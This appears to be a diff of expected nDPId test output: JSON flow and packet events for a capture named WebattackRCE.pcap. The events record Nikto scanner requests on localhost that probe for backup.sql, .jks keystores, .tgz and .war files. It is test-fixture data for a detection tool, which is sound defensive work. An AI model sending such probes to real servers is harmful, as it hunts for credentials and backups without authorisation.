+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 